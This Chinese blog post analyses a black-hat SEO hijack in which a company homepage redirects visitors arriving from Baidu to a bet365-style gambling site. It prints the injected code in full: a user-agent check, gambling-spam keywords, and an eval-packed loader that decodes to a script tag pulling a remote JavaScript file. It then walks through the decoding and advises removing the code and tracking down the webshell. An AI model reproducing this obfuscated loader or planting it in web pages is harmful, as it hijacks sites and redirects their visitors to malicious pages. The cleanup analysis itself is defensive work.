解决黑帽seo劫持问题｜详解分析，菜鸟都看得懂的内容

　　??

　　上午上q，刚登上去，老铁跟我讲被欺负了，网站从百度搜索进去，首页发生跳转到菠菜（博彩）网，开发公司的说可能是百度的问题，不是我们的问题，这种判断能力我只能说智商堪忧，又是xxxxx的网站开发公司。

　　直接进入正题，直接site:

　　打开首页发生了跳转，到

　　这个菠菜，其他页面没有，劫持代码只放在首页，我们直接看代码

　　如果是无法直接从首页查看源码的情况，那么在浏览器输入view-source:域名就可以查看网页源码

　　只需要看头部代码好熟悉，黑帽seo这行技术这几年也没什么创新，删除这两行就可以解决基本问题

　　[xss_clean]if(

　　navigator.userAgent.toLocaleLowerCase().indexOf("baidu")==-1){document.title="中亿光伏-品牌光伏集成商"}[xss_clean]

　　[xss_clean]eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){returnd[e]}];e=function(){return'\w+'};c=1;};while(c--)if(k[c])p=p.replace(newRegExp('\b'+e(c)+'\b','g'),k[c]);returnp;}('l["\e\c\1\n\f\8\o\0"]["\7\3\9\0\8"]('\g\2\1\3\9\4\0\0\m\4\8\d\6\0\8\j\0\5\h\a\k\a\2\1\3\9\4\0\6\2\3\1\d\6\t\0\0\4\2\u\5\5\7\7\7\b\v\1\e\a\2\q\b\1\c\f\5\r\p\s\b\h\2\6\i\g\5\2\1\3\9\4\0\i');',32,32,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x78|x76|window|x79|x75|x6e|x36|x38|x33|x35|x68|x3a|x62'.split('|'),0,{}))[xss_clean]

　　Keywords和description进行Unicode解码，结果：

　　bet365官方平台开户,bet365官方备用网址,bet365官方网站是多少,bet365官方亚洲版,bet365.com官方网站,bet365官方投注,bet365官方网站,bet365官方中文版,bet365中文官方网站,英国bet365官方网,bet365官方投注网站,bet365官方投注网址,bet365官方网投,bet365官方备用,bet365官方网站是多

　　[xss_clean]if(

　　navigator.userAgent.toLocaleLowerCase().indexOf("baidu")==-1){document.title="中亿光伏-品牌光伏集成商"}[xss_clean]这段意思就是判断百度搜索访问用户进行跳转，你去360，搜狗搜索访问肯定是不会发生跳转的

　　然后我们再来解最后一段代码

　　先进行js解压，得出结果

　　1：x64x6fx63x75x6dx65x6ex74结果document

　　2：x77x72x69x74x65结果write

　　3:x3cx73x63x72x69x70x74x74x79x70x65x3dx22x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74x22x73x72x63x3dx22x68x74x74x70x73x3ax2fx2fx77x77x77x2ex62x63x64x61x73x38x2ex63x6fx6dx2fx33x36x35x2ex6ax73x22x3ex3cx2fx73x63x72x69x70x74x3e

　　结果[xss_clean]

　　">[xss_clean]

　　整段的解密结果就是：

　　[xss_clean]window["document"]["write"]('[xss_clean][xss_clean]');[xss_clean]

　　到了这里整个过程已经很清晰了，虽然我们删除了这段代码但只能暂时解决问题，需要找出webshell，做一个全面的网站和服务器安全策略，这种批量GetShell的基本上都是通过目前已经开放的漏洞，所以相对还是比较容易处理

　　大多数人对网站的理解还停留在视觉层面，网络安全的重要性反而被忽视，曾经我也主攻过渗透攻防，以打击菠菜（博彩）和成人色情，传销等网站服务器为乐，我涉及这块技术的目的不是为了干点什么，而是为了解决问题。任何公司需要提高对网络安全的重视，找网络开发公司也要避免入坑????